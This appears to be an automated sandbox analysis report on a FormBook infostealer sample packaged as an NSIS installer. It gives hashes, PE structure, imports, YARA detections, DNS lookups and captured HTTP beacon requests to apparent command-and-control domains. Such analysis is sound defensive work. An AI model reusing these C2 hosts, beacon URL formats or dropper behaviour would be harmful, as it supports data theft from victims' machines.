                                Preview:.p.V.."...$..d...@.._ic.G..bE".2...$._[..0......GJ..f...*..%...Jn......m..Gm..."j....}!...J`>..2.y...... .NG...9.......j...=.....IQ.8Ea.TQ.r......G....H.....9.+.3x.....c....,............p.P]D.&T....dx...E=.E$....^Y...>i.#....E.o'w ......"$...7.."....}.."L.T..n...3=&E".2...Y._[..0K.....GJ..f......%...oJ_C".i.K.{."L..k...1...ZE...0K..f..C(3.........z.`.......j..x+_z.p.P]qG.^.o......+7.ZE..6a...{..r..%(j_..(L............s..G.p.P]Dw...u...'.O....E=.E$.4..^".....i.#.....E.e'w......."'...7..".x..}.."L.T...'...&3=.E".2...$._[..0......GJ..f......%...oJ_C".i.K.{."L..k...1...ZE...0K..f..C(3.........z.`.......j..x+_z.p.P]qG.^.o......+7.ZE..6a...{..r..%(j_....c...........q....p.P]Dw...u....Ox...E=.E$.4..^".....i.#.....E.e'w......."'...7..".x..}.."L.T...'...&3=.E".2...$._[..0......GJ..f......%...oJ_C".i.K.{."L..k...1...ZE...0K..f..C(3.........z.`.......j..x+_z.p.P]qG.^.o......+7.ZE..6a...{..r..%(j_....c...........q....p.P]Dw...u....Ox...E=.E$.4..^"..

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.585394540341449
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:4505682666.exe
                                File size:313282
                                MD5:9746147d84cb3d6b7a91ac76fc7b74b2
                                SHA1:8c70e93e0c8c29b2be64703485c30be238dee7db
                                SHA256:6d40fb5818ad031394cb4fa6e0007d69bcdf4396b7f6af749badc7a080c776ae
                                SHA512:e42bfcb749c561270ecc820db1b73426dd7503bcdfd3601cf1a9256cdefce3b881a85ba4271fa03c00224abc2d6fec78a3fecfff503c95d72ab57a3019e8d7a1
                                SSDEEP:6144:RNeZIh2Wccgp0wvA9A+R5Fm8Rdb8FxFQQ5sbF:RNj4Wqp0wvZ+X3bYFQnR
                                TLSH:08648D90EA4CFCDAE4DA0573763A942C09919AD996F4009F37673E3465B3BD3207BE06
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

                                File Icon

                                Icon Hash:f6a6a68e9af2f074

                                Static PE Info

                                General

                                Entrypoint:0x4034f7
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                Entrypoint Preview

                                Instruction
                                push ebp
                                mov ebp, esp
                                sub esp, 000003F4h
                                push ebx
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [ebp-14h], ebx
                                mov dword ptr [ebp-04h], 0040A2E0h
                                mov dword ptr [ebp-10h], ebx
                                call dword ptr [004080CCh]
                                mov esi, dword ptr [004080D0h]
                                lea eax, dword ptr [ebp-00000140h]
                                push eax
                                mov dword ptr [ebp-0000012Ch], ebx
                                mov dword ptr [ebp-2Ch], ebx
                                mov dword ptr [ebp-28h], ebx
                                mov dword ptr [ebp-00000140h], 0000011Ch
                                call esi
                                test eax, eax
                                jne 00007FD8D0CF84AAh
                                lea eax, dword ptr [ebp-00000140h]
                                mov dword ptr [ebp-00000140h], 00000114h
                                push eax
                                call esi
                                mov ax, word ptr [ebp-0000012Ch]
                                mov ecx, dword ptr [ebp-00000112h]
                                sub ax, 00000053h
                                add ecx, FFFFFFD0h
                                neg ax
                                sbb eax, eax
                                mov byte ptr [ebp-26h], 00000004h
                                not eax
                                and eax, ecx
                                mov word ptr [ebp-2Ch], ax
                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                jnc 00007FD8D0CF847Ah
                                and word ptr [ebp-00000132h], 0000h
                                mov eax, dword ptr [ebp-00000134h]
                                movzx ecx, byte ptr [ebp-00000138h]
                                mov dword ptr [0042A2D8h], eax
                                xor eax, eax
                                mov ah, byte ptr [ebp-0000013Ch]
                                movzx eax, ax
                                or eax, ecx
                                xor ecx, ecx
                                mov ch, byte ptr [ebp-2Ch]
                                movzx ecx, cx
                                shl eax, 10h
                                or eax, ecx

                                Rich Headers

                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x10f90.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x65150x6600False0.661534926471data6.43970794855IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa0000x203380x600False0.499348958333data4.01369865045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x3b0000x10f900x11000False0.167710248162data5.04779716714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x3b1900x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                RT_DIALOG0x4b9b80x100dataEnglishUnited States
                                RT_DIALOG0x4bab80x11cdataEnglishUnited States
                                RT_DIALOG0x4bbd80x60dataEnglishUnited States
                                RT_GROUP_ICON0x4bc380x14dataEnglishUnited States
                                RT_MANIFEST0x4bc500x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                Imports

                                DLLImport
                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                04/02/22-06:13:05.752479TCP1201ATTACK-RESPONSES 403 Forbidden804985799.83.248.72192.168.2.3

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 2, 2022 06:12:54.470439911 CEST4983280192.168.2.3104.21.60.208
                                Apr 2, 2022 06:12:54.497025967 CEST8049832104.21.60.208192.168.2.3
                                Apr 2, 2022 06:12:54.497224092 CEST4983280192.168.2.3104.21.60.208
                                Apr 2, 2022 06:12:54.497344017 CEST4983280192.168.2.3104.21.60.208
                                Apr 2, 2022 06:12:54.523482084 CEST8049832104.21.60.208192.168.2.3
                                Apr 2, 2022 06:12:54.537738085 CEST8049832104.21.60.208192.168.2.3
                                Apr 2, 2022 06:12:54.537889004 CEST8049832104.21.60.208192.168.2.3
                                Apr 2, 2022 06:12:54.537954092 CEST4983280192.168.2.3104.21.60.208
                                Apr 2, 2022 06:12:54.538603067 CEST4983280192.168.2.3104.21.60.208
                                Apr 2, 2022 06:12:54.564132929 CEST8049832104.21.60.208192.168.2.3
                                Apr 2, 2022 06:12:59.573195934 CEST4985380192.168.2.323.225.32.156
                                Apr 2, 2022 06:12:59.733163118 CEST804985323.225.32.156192.168.2.3
                                Apr 2, 2022 06:12:59.733279943 CEST4985380192.168.2.323.225.32.156
                                Apr 2, 2022 06:12:59.734400034 CEST4985380192.168.2.323.225.32.156
                                Apr 2, 2022 06:12:59.892374039 CEST804985323.225.32.156192.168.2.3
                                Apr 2, 2022 06:12:59.893215895 CEST804985323.225.32.156192.168.2.3
                                Apr 2, 2022 06:12:59.893692017 CEST4985380192.168.2.323.225.32.156
                                Apr 2, 2022 06:12:59.895061970 CEST804985323.225.32.156192.168.2.3
                                Apr 2, 2022 06:12:59.895195961 CEST4985380192.168.2.323.225.32.156
                                Apr 2, 2022 06:13:00.335936069 CEST4985380192.168.2.323.225.32.156
                                Apr 2, 2022 06:13:00.493033886 CEST804985323.225.32.156192.168.2.3
                                Apr 2, 2022 06:13:05.233402014 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.250947952 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.251135111 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.251300097 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.268805981 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.742883921 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.752479076 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.752692938 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.752693892 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.752736092 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.752770901 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.752840996 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.760608912 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.760739088 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:05.766953945 CEST804985799.83.248.72192.168.2.3
                                Apr 2, 2022 06:13:05.767090082 CEST4985780192.168.2.399.83.248.72
                                Apr 2, 2022 06:13:10.823151112 CEST4985880192.168.2.3203.170.80.250
                                Apr 2, 2022 06:13:13.824510098 CEST4985880192.168.2.3203.170.80.250
                                Apr 2, 2022 06:13:19.822112083 CEST4985880192.168.2.3203.170.80.250

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 2, 2022 06:12:38.072242975 CEST6462453192.168.2.38.8.8.8
                                Apr 2, 2022 06:12:38.599751949 CEST53646248.8.8.8192.168.2.3
                                Apr 2, 2022 06:12:43.619493008 CEST6275653192.168.2.38.8.8.8
                                Apr 2, 2022 06:12:43.645440102 CEST53627568.8.8.8192.168.2.3
                                Apr 2, 2022 06:12:48.651667118 CEST5849753192.168.2.38.8.8.8
                                Apr 2, 2022 06:12:49.397546053 CEST53584978.8.8.8192.168.2.3
                                Apr 2, 2022 06:12:54.440186024 CEST6270153192.168.2.38.8.8.8
                                Apr 2, 2022 06:12:54.462097883 CEST53627018.8.8.8192.168.2.3
                                Apr 2, 2022 06:12:59.543123960 CEST5352453192.168.2.38.8.8.8
                                Apr 2, 2022 06:12:59.572199106 CEST53535248.8.8.8192.168.2.3
                                Apr 2, 2022 06:13:04.911705017 CEST6155553192.168.2.38.8.8.8
                                Apr 2, 2022 06:13:05.232255936 CEST53615558.8.8.8192.168.2.3
                                Apr 2, 2022 06:13:10.786650896 CEST6443353192.168.2.38.8.8.8
                                Apr 2, 2022 06:13:10.822009087 CEST53644338.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Apr 2, 2022 06:12:38.072242975 CEST192.168.2.38.8.8.80xb922Standard query (0)www.stxgvdhndry.mobiA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:43.619493008 CEST192.168.2.38.8.8.80x6942Standard query (0)www.malmaten.xyzA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:48.651667118 CEST192.168.2.38.8.8.80xc529Standard query (0)www.supertry.onlineA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:54.440186024 CEST192.168.2.38.8.8.80x8c27Standard query (0)www.sarahkramirez.storeA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:59.543123960 CEST192.168.2.38.8.8.80xaa1aStandard query (0)www.03gjm.xyzA (IP address)IN (0x0001)
                                Apr 2, 2022 06:13:04.911705017 CEST192.168.2.38.8.8.80xc752Standard query (0)www.taeksanglee.comA (IP address)IN (0x0001)
                                Apr 2, 2022 06:13:10.786650896 CEST192.168.2.38.8.8.80x67abStandard query (0)www.ohhhmarketing.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Apr 2, 2022 06:12:38.599751949 CEST8.8.8.8192.168.2.30xb922Name error (3)www.stxgvdhndry.mobinonenoneA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:43.645440102 CEST8.8.8.8192.168.2.30x6942Name error (3)www.malmaten.xyznonenoneA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:49.397546053 CEST8.8.8.8192.168.2.30xc529Server failure (2)www.supertry.onlinenonenoneA (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:54.462097883 CEST8.8.8.8192.168.2.30x8c27No error (0)www.sarahkramirez.store104.21.60.208A (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:54.462097883 CEST8.8.8.8192.168.2.30x8c27No error (0)www.sarahkramirez.store172.67.201.126A (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST8.8.8.8192.168.2.30xaa1aNo error (0)www.03gjm.xyzwww.9tv-cname.comCNAME (Canonical name)IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST8.8.8.8192.168.2.30xaa1aNo error (0)www.9tv-cname.com9tv-cname.comCNAME (Canonical name)IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST8.8.8.8192.168.2.30xaa1aNo error (0)9tv-cname.com23.225.32.156A (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST8.8.8.8192.168.2.30xaa1aNo error (0)9tv-cname.com104.233.177.157A (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST8.8.8.8192.168.2.30xaa1aNo error (0)9tv-cname.com23.224.235.100A (IP address)IN (0x0001)
                                Apr 2, 2022 06:12:59.572199106 CEST8.8.8.8192.168.2.30xaa1aNo error (0)9tv-cname.com23.225.30.43A (IP address)IN (0x0001)
                                Apr 2, 2022 06:13:05.232255936 CEST8.8.8.8192.168.2.30xc752No error (0)www.taeksanglee.comtaeksanglee.comCNAME (Canonical name)IN (0x0001)
                                Apr 2, 2022 06:13:05.232255936 CEST8.8.8.8192.168.2.30xc752No error (0)taeksanglee.com99.83.248.72A (IP address)IN (0x0001)
                                Apr 2, 2022 06:13:05.232255936 CEST8.8.8.8192.168.2.30xc752No error (0)taeksanglee.com75.2.0.44A (IP address)IN (0x0001)
                                Apr 2, 2022 06:13:10.822009087 CEST8.8.8.8192.168.2.30x67abNo error (0)www.ohhhmarketing.com203.170.80.250A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.sarahkramirez.store
                                • www.03gjm.xyz
                                • www.taeksanglee.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.349832104.21.60.20880C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Apr 2, 2022 06:12:54.497344017 CEST8564OUTGET /iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ HTTP/1.1
                                Host: www.sarahkramirez.store
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Apr 2, 2022 06:12:54.537738085 CEST8565INHTTP/1.1 301 Moved Permanently
                                Date: Sat, 02 Apr 2022 04:12:54 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Sat, 02 Apr 2022 05:12:54 GMT
                                Location: https://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPT8VpB4X3uQUWjRRRg09kMofZQk896lOlKc3nSbh4o01B%2Fgb4jnuzcVwHv%2FYbZZ7kPtihs7fVPBXfwHbEUHaUOE%2FOTEPiQ%2B3OBsZNlF3fe8Gh6dK8mVl9d2WSFuqHC5qGtYOIbjyRQMiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 6f56ba98ab0772ca-LHR
                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.34985323.225.32.15680C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Apr 2, 2022 06:12:59.734400034 CEST8614OUTGET /iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA HTTP/1.1
                                Host: www.03gjm.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Apr 2, 2022 06:12:59.893215895 CEST8616INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Sat, 02 Apr 2022 04:12:59 GMT
                                Content-Type: text/html
                                Content-Length: 162
                                Connection: close
                                Location: https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.34985799.83.248.7280C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Apr 2, 2022 06:13:05.251300097 CEST8627OUTGET /iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ HTTP/1.1
                                Host: www.taeksanglee.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Apr 2, 2022 06:13:05.752479076 CEST8628INHTTP/1.1 403
                                Date: Sat, 02 Apr 2022 04:13:05 GMT
                                Content-Type: application/json;charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Set-Cookie: JSESSIONID=FED7437DB0D0973D1DCAFC8A56C3DE27; Path=/; HttpOnly
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 1; mode=block
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: 0
                                Data Raw: 37 37 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 32 2d 30 34 2d 30 32 54 30 34 3a 31 33 3a 30 35 2e 36 31 35 2b 30 30 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 33 2c 22 65 72 72 6f 72 22 3a 22 46 6f 72 62 69 64 64 65 6e 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 63 63 65 73 73 20 44 65 6e 69 65 64 22 2c 22 70 61 74 68 22 3a 22 2f 69 65 64 69 2f 22 7d 0d 0a
                                Data Ascii: 77{"timestamp":"2022-04-02T04:13:05.615+0000","status":403,"error":"Forbidden","message":"Access Denied","path":"/iedi/"}
                                Apr 2, 2022 06:13:05.752692938 CEST8628INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:06:11:11
                                Start date:02/04/2022
                                Path:C:\Users\user\Desktop\4505682666.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\4505682666.exe"
                                Imagebase:0x400000
                                File size:313282 bytes
                                MD5 hash:9746147D84CB3D6B7A91AC76FC7B74B2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Target ID:2
                                Start time:06:11:12
                                Start date:02/04/2022
                                Path:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                Imagebase:0x9c0000
                                File size:4096 bytes
                                MD5 hash:4745AFD382988B0E54FCA3B7C6CC62C6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Target ID:4
                                Start time:06:11:13
                                Start date:02/04/2022
                                Path:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                Imagebase:0x9c0000
                                File size:4096 bytes
                                MD5 hash:4745AFD382988B0E54FCA3B7C6CC62C6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
